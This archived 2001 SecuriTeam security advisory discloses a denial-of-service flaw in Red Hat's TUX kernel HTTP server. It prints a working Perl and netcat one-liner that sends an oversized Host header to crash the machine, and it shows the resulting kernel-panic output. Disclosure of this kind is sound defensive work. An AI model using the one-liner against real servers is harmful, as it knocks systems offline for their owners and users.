[UNIX] TUX HTTPD Denial of Service Condition (Large Host)
From: support@securiteam.comDate: 11/05/01
- Previous message: support@securiteam.com: "[NEWS] Ikonboard Cookie Filter Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [UNIX] TUX HTTPD Denial of Service Condition (Large Host) Message-Id: <20011105081235.C8D2E138BF@mail.der-keiler.de> Date: Mon, 5 Nov 2001 09:12:35 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
TUX HTTPD Denial of Service Condition (Large Host)
------------------------------------------------------------------------
SUMMARY
<http://www.redhat.com/docs/manuals/tux/> Tux is a Kernel-Space HTTP
server coded for optimal performance (IRQ Affinity, HTTP Compression,
direct scatter-gather DMA etc.) and is meant to be used as the main HTTP
server for static objects with requests for dynamic content being passed
to a user-space HTTPD server such as Apache on same box when necessary. A
security vulnerability in the product allows crashing of the server by
sending the server a large Host parameter inside a valid HTTP GET request.
DETAILS
Vulnerable systems:
RedHat Linux 7.2:
0) Kernel(s) 2.4.7-10 and 2.4.9-7
0) TUX-2.1.0-2.
The TUX web server is disabled by default.
It is possible to cause a denial of service condition by submitting an
oversized "Host:" header request to the Tux daemon causing an assertion
failure and eventual Kernel Panic. A total system reboot is required to
return the box to full functionality. For example the following script:
perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc 80
Will cause the affected box to crash with the below output (edited for
brevity):
Code: Bad EIP Value.
(0)Kernel Panic: Aiee, killing interrupt handler!
In interrupt handler - not syncing!
Despite being able to affect the contents of the EIP register, it seems
this vulnerability cannot be utilized to provide for a remote root
compromise.
ADDITIONAL INFORMATION
The information has been provided by <mailto:a.orawe@ntlworld.com> Aiden
ORawe.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Ikonboard Cookie Filter Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
